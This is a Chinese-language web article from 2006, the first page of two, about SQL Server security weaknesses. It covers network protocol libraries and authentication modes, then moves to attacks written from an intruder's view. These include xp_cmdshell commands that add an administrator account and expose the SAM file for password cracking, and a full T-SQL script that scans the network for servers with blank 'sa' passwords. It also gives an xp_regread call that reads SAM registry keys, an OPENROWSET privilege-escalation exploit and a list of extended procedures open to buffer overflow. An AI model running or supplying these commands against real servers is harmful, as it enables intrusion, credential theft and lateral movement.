分享
 
 
 

关于SQL SERVER的一些安全问题

王朝mssql·作者佚名  2006-11-24
窄屏简体版  字體: |||超大  

目前关于NT服务器的入侵,有很多种方法,如对IIS的漏洞进行利用,但大家不知道注意到没有,其实通过与NT服务器相关联的SQL数据库服务器的例子也是很有比例的一种手段。大家可以参看下面的一个新闻报道:http://www.vnunet.com/News/1110938。Herbless入侵破坏的一些站点,如legoland.co.uk站点就是通过SQL服务器

的入侵而获得对系统的控制权而破坏的。所以对SQL服务器的保护是必不可少的,这里我整理了一些漏洞供大家来参考,见笑,见笑。

----------------------------------------------------------------

我们先来看看SQL服务程序支持的网络协议库:

----------------------------------------------------------------

| SQL Server Network Protocol Libraries |

----------------------------------------------------------------

|Protocol library| 可能存在的漏洞 | 是否加密 |

----------------------------------------------------------------

|Named pipes | --使用NT SMB端口(TCP139,UDP137, | 否 |

|(有名管道) | 138)来进行通信,这些可以被通 | |

| | 的防火墙控制,但如果内部网络可| |

| | 随意访问的话也是一个不小的缺陷| |

| | --用户名字,密码和数据没有进行加| |

| | 传输,任何人可以通过SNIFFER来 | |

| | 进行数据捕获。 | |

----------------------------------------------------------------

|IP Sockets | --默认状态下开1433口,你可以使用| 否 |

| | 扫描器来查看这个端口。 | |

| | 可以被SNIFFER截获数据。 | |

----------------------------------------------------------------

|Multi-Protocol | --客户端需要支持NT RPCs;在不同 | 是 |

| | 种类的环境中可能引起问题。 | |

| | --默认情况下使用TCP随机端口,但| |

| | 防火墙进行端口图固定实现(参 | |

| | 看KB Q164667)。 | |

| | --需要注意加密选项是否选择,默 | |

| | 是不选择此选项的。 | |

----------------------------------------------------------------

|NWLink | --存在被SNIFFER截获数据的危险 | 否 |

----------------------------------------------------------------

|AppleTalk (ADSP)| --存在被SNIFFER截获数据的危险 | 否 |

----------------------------------------------------------------

|Banyan Vines | --存在被SNIFFER截获数据的危险 | 否 |

----------------------------------------------------------------

一般的推荐使用是:如果你能在Integrated (NT) Security上使用Named Pipes 或者Multi-protocol,那你就使用这些协议库,如果可能,尽量使用Multi-protocol和使能加密选项。如果你上面几个不能使用,那就使用IP Sockets协议,并改变其默认的端口并随时检查系统保证无任何SNIFFER存在。并且,考虑使用一WEB服务或者COM组件作为应用程序的business object layer,并在中间层和SQL服务程序中使用安全通道(secure channel)。有不少第三方的产品可以加密这方面的通信。

-----------------------------------------------------------------------

下面再讲一下SQL SERVER的各种安全模式和它们怎样进行工作?

安全模式定义了一些SQL SERVER是怎样认证要使用它们服务的用户,请看下面SQL Server 6.5的安全模式和在SQL Server 7.0做了改变的一些描述和区别:

-------------------------------------------------------------------

|安全模式 | SQL Server 6.5 | SQL Server 7.0改变地方 |

-------------------------------------------------------------------

|Standard | --登陆定义在SQL SERVER里| --单独的标准模式在SQL SERVER|

|标准模式 | 而且给定密码。 | 没有使用了。 |

| | --SQL SERVER的登录帐户与| |

| | WINDOW NT分开 | |

-------------------------------------------------------------------

|Integrated |-使用安全管理器SQL的帐 | --在这里成为"Windows NT only"|

|综合模式 | 户。 | 模式。 |

| |-用户在连接到SQL SERVER| --只工作在NT系统下,在WIN9X不|

| | 不需要特定分开LOGIN和 | 支持。 |

| | 密码。 | |

| |-密码从不存储在应用程序| --可以直接结合到NT的组中便于 |

| | 中,并不以明文在网络中| 管理,(注意有一BUILTIN组在|

| | 传输。 | 本地系统上产生). |

| |-SQL SERVER可以使用NT的| |

| | 的认证方式来认证用户并| |

| | 可以使用如帐户过期等。| |

| |-需要Named Pipe或Multi-| |

| | Protocol库。 | |

--------------------------------------------------------------------

|Mixed |-提供上面的方式的一些特| --成为SQL SERVER和WINDOWS NT |

|混合性方式 | 征但有后退的东西是客户| 模式。 |

| | 端不能建立可信任连接。| --尽量使用WINDOW NT ONLY模式 | |

--------------------------------------------------------------------

登录只不过是第一步,一旦用户登录,用户必须访问独立的数据库,要使上面的成立,就必须在sysusers表里存在一表目给用户用的每个数据库。所以安全请你注意在你的数据库中是否存在"guest"帐户和保证不会在你不注意的时候给某些人访问你的数据库。

详细的大家可以参看微软的站点:

http://www.microsoft.com/technet/SQL/Technote/secure.asp

---------------------------------------------------------------------

关于SQL SERVER存在的一些安全问题:

存在"sa"帐户,密码就为空,而且这个密码是SQL SERVER安全模块成员,我们就可以通过xp_cmdshell stored procedure(扩展存储过程)来进行命令操作,如:

Xp_cmdshell "net user testuser UgotHacked /ADD"

然后在:

Xp_cmdshell "net localgroup Administrators testuser /ADD"

这样攻击者就成功的在SQL SERVER上增加了一个用户。

当然远程的话,一般需要有1433口开着,通过MYSQL 客户端进行连接。

当然你也可以使用:

Xp_cmdshell "rdisk /s-"

的方法,这样就在\winnt\repair目录里重建了信息而不提示用户。然后在SAM备份以后,攻击者可以建立一个SMB连接到共享或者建立一个连接:

Xp_cmdshell "net share getsam=c:\winnt\repair"

利用共享获得这个文件,然后在使用l0phtcrack来跑吧。如果SMB端口被防火墙控制了,或者关闭了,攻击者也可以拷贝sam._文件到WEB目录进行匿名浏览器下载。如果人家没有开IIS,你何不用tftp呢:).

OK,通过这台被控制的SQL SERVER服务器,攻击者可以通过它来查找网络内部其他机器来扩大战果,下面是一个SQL脚本来列举网络中其他SQL SERVER存在空帐户'sa'的示例:

-----------------------------------------------------------------------

-- Create temp table to store enumerated servers

SET NOCOUNT ON

CREATE TABLE #temp (shelldump varchar(255))

INSERT #temp EXEC xp_cmdshell 'osql -L'

DECLARE @current_server varchar(255), @conn_string varchar(255)

DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp

OPEN sql_cursor FETCH NEXT FROM sql_cursor INTO @current_server

-- Loop through potential targets and check for null sa accounts

-- If target is vulnerable, version information will be displayed

WHILE @@FETCH_STATUS = 0

BEGIN

If @current_server <> 'Servers:'

BEGIN

SELECT @current_server = rtrim(ltrim(@current_server))

SELECT @conn_string = 'exec xp_cmdshell ''osql -S' + @current_server + ' -Usa -P -Q "select @@version"'''

PRINT 'Attempting connection to server: ' + @current_server

EXECUTE (@conn_string)

PRINT '====================================================================='

END

FETCH NEXT FROM sql_cursor INTO @current_server

END

--Clean up

CLOSE sql_cursor

DEALLOCATE sql_cursor

DROP TABLE #TEMP

----------------------------------------------------------------------

当然有些人也可能关闭xp_cmdshell extended stored procedure(扩展存储过程),我们也可以使用下面的方法:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

如果MSSqlserver 服务在本地系统帐户下运行,并且如果系统上没有安装syskey,上面的调用就可以返回注册表中加密的密码或者SID。

--------------------------------------------------------------------------

另一个漏洞,是关于adhoc heterogenous queries 来进行权利的提升,请看下面微软的描述:http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

关于上面的漏洞,可以使用下面的xploit来获得权利的提升:

SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver',

'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')

这是大家比较喜欢的一种可以执行其他命令,自己想吧。

---------------------------------------------------------------------------

还有就是最近的一个漏洞:Extended Stored Procedure Parameter Parsing (扩展存储过程参数解析)的漏洞,详细信息在这个URL有介绍:

http://www.microsoft.com/technet/security/bulletin/ms00-092.asp

起主要问题是在MSD中提供一个API函数srv_paraminfo(),它是用来扩展存储过程调用时解释深入参数的,如:

exec <存储过程名> <参数1>, <参数2>, ...

如要查询“c:\winnt”的目录树,可以如下表达:

exec xp_dirtree 'c:\winnt'

但没有检查各个参数的长度,传递相当长的字符串,就存在了覆盖其他堆栈参数的可能导致缓冲溢出。

目前已经知道的过程如下:

目前已知受影响的扩展存储过程如下:

1、xp_peekqueue (xpqueue.dll)

xp_printstatements (xprepl.dll)

给第一个参数传递超长的字符串会覆盖异常处理程序所保存的返回地址。

2、xp_proxiedmetadata (xprepl.dll)

该存储过程使用4个参数。给第二个参数传递超长的字符串会覆盖异常处理程序所保存的返回地址。

3、xp_SetSQLSecurity (xpstar.dll)

该存储过程使用4个参数。给第三个参数传递超长的字符串会使整个SQL Server进程立即终止。

4、xp_displayparamstmt(xprepl.dll)

xp_enumresultset(xprepl.dll)

xp_showcolv (xprepl.dll)

xp_updatecolvbm (xprepl.dll)

给第一个参数传递超长的串将导致非法操作并覆盖异常处理程序所保存的返回地址。

这里告诉大家一个技巧性的东西,如果想要知道这些扩展存储过程调用了那写dll文件,你可以如下操作,如:

select o.name,c.text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and o.name = 'xp_peekqueue'

这样你就可以获得调用这个扩展存储过程的DLL了,如果微软没有出补丁的话,你就暂时把这个DLL文件

[1] [2] 下一页

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有